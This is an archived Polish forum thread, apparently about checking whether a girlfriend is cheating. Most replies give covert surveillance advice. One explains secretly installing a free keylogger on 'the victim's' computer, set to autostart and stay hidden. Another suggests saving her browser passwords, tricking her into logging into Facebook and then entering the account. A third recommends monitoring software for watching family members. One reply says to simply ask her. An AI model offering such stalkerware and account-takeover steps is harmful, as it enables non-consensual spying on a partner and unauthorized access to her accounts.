Jeżeli masz dostęp do jej kompa np. przychodzisz d niej to wcześniej pobierz na pendriva keyloggera (wbij w google wpisz keylogger download free) kiedyś takiego miałem i instalujesz go u ofiary na pc, a potem wszystko co ona napiszę na klawiaturze będziesz mieć zapisane w notatniku :) możesz ustawić, żeby się automatycznie włączał z komputerem i, aby był też niewidzialny dla użytkownika (będziesz musiał wcisnąć klawisze, aby się ujawnił np. ctrl+shift+z coś takiego sam sobie będziesz mógł to ustawić)

Opublikowano

Temat stary, ale od siebie polecam Omniquad Desktop Surveillance Personal Edition 5.0. Sprawdza aktywność na naszym komputerze. Działa na siostrę, brata, kota, psa, rodziców i każdego, kto skorzysta z twojego komputera.

Admin Cienia
Opublikowano

Pisać można wiele, podejrzewasz to się spytaj, jak coś nie tak to wyjdzie i ci powie wprost jak nie to będziesz oszukiwany.

Astra G 2.0 Turbo 247KM 351NM

Opublikowano

Może zły pomysł, ale napisze.

Ustaw sobie tam zapisywanie haseł w przegglądarce i zapros ją do domu. Ona sie na fejsa zaloguje, ty wyjdziesz niby do WC a pójdziesz wyłączyć korki. No i pare minut ona posiedzi, potem pójddzie do domu i se tam wbijesz i git xD

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

×
×
  • Dodaj nową pozycję...